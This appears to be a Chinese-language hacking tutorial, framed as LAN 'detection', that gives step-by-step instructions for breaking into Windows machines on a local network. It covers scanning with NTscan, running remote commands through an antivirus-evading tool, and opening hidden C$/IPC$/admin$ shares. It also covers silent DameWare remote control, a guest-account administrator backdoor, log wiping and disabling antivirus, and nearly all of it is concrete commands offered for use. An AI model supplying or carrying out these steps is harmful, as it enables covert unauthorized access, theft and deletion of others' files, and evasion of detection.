|
對局域網(wǎng)檢測全過程
一般要用到三個:NTscan變態(tài)掃描器����,Recton--D賀免殺專用版�,DameWare迷你中文版 4.5. (前兩個工具殺毒軟件都會報毒,建議將殺毒軟件實時防毒暫時關掉���,并將這兩個軟件的壓縮包加密�,防止被殺��。)
入侵步驟:
1.使用"NTscan變態(tài)掃描器"����,在IP處填上要掃描的IP范圍,選擇"WMI掃描"方式���,按"開始"后就等掃描結果了����。
2.使用"Recton--D賀免殺專用版"
選擇"CMD命令"項���,在"CMD:"中輸入"net share C$=C:\"��,即可開啟遠程主機的C盤共享���,以此將"C"換成D,E,F等,即可開啟D盤�����,E盤����,F(xiàn)盤等的共享,這種共享方式隱蔽性很高�����,而且是完全共享,在對方主機上不會出現(xiàn)一只手托住盤的共享標志����,然后在地址欄中輸入"\\對方IP\C$",即可進入對方C盤�����。
選擇"Telnet"項��,在"遠程主機"中輸入剛才掃描到的一個IP���,遠程啟動Telnet服務���,成功后在"CMD選項"中,執(zhí)行命令:"net share ipc$",接著執(zhí)行:"net share admin$",最后執(zhí)行"net use [url=file://\\***.***.***.***\IPC$]\\***.***.***.***\IPC$[/url]" /user:administrator"在*處填入你入侵的主機IP��。
3.使用"DameWare迷你中文版 4.5"����,安裝后點"DameWare Mini Remote Control",在"幫助"項中選擇激活產(chǎn)品����,輸入注冊信息�����,成功注冊后,進入"遠程連接"窗口�,在"主機"處填入IP地址,點"設置"�����,在"服務安裝選項"中點"編輯"后,在"通知對話框"中去掉"連接時通知",在"附加設置"中全都不選���,在"用戶選項"中去掉"啟用用戶選項菜單"���。設置完成好后,就可點"連接"��,在彈出的對話框中點"確定"后�,成功后你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監(jiān)視對方屏幕�。 注意:如果不注冊的話,在對方主機上會彈出一個對話框�����,暴露你的身份。
入侵步驟補充:
1.在以上第2步中���,遠程啟動Telnet服務可以通過"我的電腦-管理-連接到另一臺計算機-輸入IP-服務和應用程序-服務-將telnet改為手動-啟動"完成�。
2.Recton-D賀免殺專用版還有其他功能����,在"進程"項中,可以查看遠程主機的進程����,并可任意結束其中進程;在"共享"項中,可以創(chuàng)建共享���,我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對應C:\,D:\等�,共享好后在地址欄中輸入[url=file://\\IP\C$]\\IP\C$[/url],進入對方C盤�,你就可以隨意復制刪除里面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標����,也就不會被發(fā)現(xiàn),弄完后最好還是把共享給關掉����。最后選"日志"�����,清除所有日志�,不留痕跡�。這個軟件會被殺毒軟件當作病毒殺掉�,用它時須將實時防毒關掉。
3.上面的共享可通過CMD(程序-附件-命令提示符)完成���,首先"telnet IP",telnet上去,鍵入y后輸入的用戶名"administrator",密碼為空, 進入后�,開共享用net share命令�����,共享C$(即C盤):"net share C$=C:",共享system文件夾:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是關閉共享�,關閉C盤共享:"net share C$ /del"。
4.為方便下次入侵��,可以設置后門�, 查看用戶:"net user",激活guest用戶
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的權限提升為管理員權限:"net localgroup administrators guest /add"。
5.telnet命令(dos命令)很多�,可去網(wǎng)上查找它的命令,常用的有:查看D盤文件:""dir d:\",查看C盤program file文件夾:"dir c:\PROGRA~1\;",60秒倒記時關機:"shutdown -s -t 60"
補充說明:
1.net use錯誤原因解決:
(1)."發(fā)生系統(tǒng)錯誤 1326�。 登錄失?�。?未知的用戶名或錯誤密碼���。"
在遠程機的"控制面板-文件夾選項-查看-簡單的文件共享",去掉選取,然后再嘗試連接。簡單文件共享會把網(wǎng)絡連接權限都歸為 guest連接���,是無法訪問C$等管理共享的.
(2)"發(fā)生系統(tǒng)錯誤 1327���。 登陸失敗:用戶帳戶限制�����??赡艿脑虬ú辉试S空密碼,登陸時間限制����,或強制的策略限。"在遠程機的"控制面板-管理工具-本地安全策略-安全選項-用戶權限"指派里�����,禁用"空密碼用戶只能進行控制臺登陸".
(3)"http://IP/c$"時提示找不到網(wǎng)絡途徑。在"網(wǎng)絡和撥號連接"中"本地連接"中選取"Internet協(xié)議(TCP/IP)"屬性����,進入"高級TCP/IP設置"選"WINS設置"里面有一項"啟用TCP/IP的NETBIOS".
|
